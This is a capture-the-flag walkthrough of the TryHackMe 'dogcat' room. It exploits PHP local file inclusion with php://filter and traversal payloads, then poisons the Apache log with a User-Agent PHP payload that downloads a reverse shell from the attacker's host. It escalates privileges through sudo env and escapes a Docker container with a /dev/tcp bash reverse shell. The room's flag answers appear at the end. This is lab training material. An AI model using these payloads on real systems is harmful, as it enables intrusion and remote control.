Tryhackme - dogcat

Tryhackme – dogcat

In this walk through, we will be going through the dogcat room from Tryhackme. This is a medium rated room on the platforms which consist of an PHP application to view the images of dogs and cats, that can be exploited by LFI and later have to break out of a docker container to root the box. Overall, it is a fun room to pull your hairs in the frustration. On that note, let’s get started.

dogcat

Machine Info:

Titledogcatvm
IPaddress10.10.156.142
DifficultyMedium
ObjectiveI made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container.

Phase 1 – Enumeration

  • Checking if machine is live or not.

pinging the machine

  • The nmap scan gives two ports open – 80 (HTTP) and 22 (SSH)

wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.156.142

Starting Nmap 7.80 ( https://nmap.org ) at 2023-04-19 21:28 IST

Host is up (0.25s latency).
Not shown: 997 closed ports
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.93 seconds

nmap scan

  • Checking out the website running on port 80. Found an application that display dogs or cats pics based on our choices.

Website on port 80

  • Fired up the gobuster to gather some directory info. No use in this one.

wh1terose@fsociety:~$ gobuster dir -u http://10.10.156.142/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.156.142/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/19 21:32:05 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 278]
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/cats                 (Status: 301) [Size: 313] [--> http://10.10.156.142/cats/]
/index.php            (Status: 200) [Size: 418]                                 
/server-status        (Status: 403) [Size: 278]                                 
                                                                                
===============================================================
2023/04/19 21:34:08 Finished
===============================================================

gobuster scan

Forbidden error

  • Found ?view= parameter, which can be exploited using LFI

LFI found

  • Tried using LFI paylods. The application is using base 64 encoding to wrap up the inputs.

http://10.10.156.142/?view=dog/../../../../../../etc/passwd

/etc/passwd

  • First gathered information about the function running in the background. Found a base 64 encoded string which then decoded with Cyberchef gives me a PHP source code, which gives a better understanding of the application.
http://10.10.156.142/?view=php://filter/convert.base64-encode/resource=./dog/../index

base 64 string

PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== 

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>

cyberchef base64 decode

  • Got the /etc/passwd files content using the following payload.

http://10.10.156.142/?view=dog/../../../../../etc/passwd&ext=

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

cat /etc/passwd

  • Accessing Apache Server logs.

http://10.10.156.142/?view=dog/../../../../../var/log/apache2/access.log&ext=

apache log file

  • Now we will upload a php reverse shell in the GET request and then will trigger the same via browser. The connection will be captured by a netcat listener.

wh1terose@fsociety:~/CTF/TryHackme/dogcat$ curl -A "<?php file_put_contents('revshell.php',file_get_contents('http://10.18.11.103:8000/revshell.php'))?>" -s http://10.10.156.142
<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
            </div>
</body>

</html>

python http server

getting response

Phase 2 – Initial Access:

  • Got our shell access using the uploaded php reverse shell.

reverseshell.php

netcat listener

  • Find our first flag in the /src folder in /var/www/html folder.

flag 1

  • Got the second flag in the /var/www folder.

flag 2

Phase 3 – Privilege Escalation

  • Checking for any sudo misconfigurations. Found the env binary. Next, exploited it to get the root shell using GTFObins.

$ sudo -l
Matching Defaults entries for www-data on 119433eddedd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on 119433eddedd:
    (root) NOPASSWD: /usr/bin/env

sudo -l

GTFObins env

  • Got our root shell. Now looking for flags. found the third one in the root folder.

$ sudo env /bin/sh

$ $ id
uid=0(root) gid=0(root) groups=0(root)

cd /root
ls
flag3.txt
cat flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}

flag 3

  • Next to get our fourth flag. We have to break out of the container we are in. To break it, we will use the backup.sh script, changing the content to our reverse shell. Got us out from the container and we got our final flag.

ls
backup.sh
backup.tar
root
cat backup.sh
#!/bin/bash
tar cf /root/container/backup/backup.tar /root/container
echo "#!/bin/bash" > backup.sh
echo "bash -i >& /dev/tcp/10.18.11.103/4444 0>&1" >> backup.sh
cat backup.sh
#!/bin/bash
bash -i >& /dev/tcp/10.18.11.103/4444 0>&1

reverse shell for root

root flag

Task 1 – Dogcat

Question 1 – What is flag 1?

THM{Th1s_1s_N0t_4_Catdog_ab67edfa}

Question 2 – What is flag 2?

THM{LF1_t0_RC3_aec3fb}

Question 3 – What is flag 3?

THM{D1ff3r3nt_3nv1ronments_874112}

Question 4 – What is flag 4?

THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}

Task 1 - Dogcat

Also Read: Tryhackme – Diamond Model

Conclusion:

Conclusion

So that was “dogcat” for you. So, this room was a bit annoying on the enumeration part but i think that’s how it has to be. We started off with a regular nmap scan, found 80 (HTTP) and 22 (SSH). On port 80, found an application running which let us chose from dogs and cat. On choosing one of them, displays the images for the same. Next, fired up gobuster on the server, which reveals cats directory however i was unable to access it. Next, while viewing the images found out that the parameter view can be exploited for LFI. Tried some random LFI payloads but no luck. Next, gathered some information about the application by encoding the queries in base64. Found out the underlying implementation and using that dumped the /etc/passwd file. Next, dumped the apache log file for further information. Moving on, uploaded a reverse shell using curl and got a shell on our listener netcat. With the existing shell, we were able to get the 2 flags. For privilege escalation part, we exploited the env binary to get the root shell and the 3rd flag. For the root flag, we have to break out of the container. For that, we used backup.sh to get the execute our reverse shell and got a root shell breaking the container and getting the root flag and the divorce papers my wife left for me.

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top